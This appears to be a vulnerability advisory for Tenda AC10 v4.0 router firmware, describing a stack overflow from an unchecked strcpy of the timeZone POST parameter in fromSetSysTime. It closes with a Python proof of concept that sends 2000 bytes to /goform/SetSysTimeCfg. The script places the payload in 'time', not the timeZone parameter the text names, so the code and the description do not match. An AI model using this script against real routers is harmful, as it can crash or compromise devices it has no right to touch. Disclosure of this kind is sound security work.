-
Manufacturer's website information:https://www.tenda.com.cn/
-
Firmware download website: https://www.tenda.com.cn/download/detail-3506.html、https://www.tenda.com.cn/download/detail-3684.html
AC10 v4.0 V16.03.10.13、V16.03.10.20
The Tenda AC10 v4.0 V16.03.10.13 firmware has a stack overflow vulnerability in the fromSetSysTime
function. The v5
variable receives the timeType
parameter from a POST request and we let v5=="sync"
to execute function sub_4A75C0
.
The s
variable receives the timeZone
parameter from a POST request. However, since the user can control the input of timeZone
, the statement strcpy((char *)v6, s);
can cause a buffer overflow. The user-provided timeZone
can exceed the capacity of the v6
array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"
payload = b"a"*2000
data = {
'timeType':'sync',
'time':payload,
}
response = requests.post(url, data=data)
print(response.text)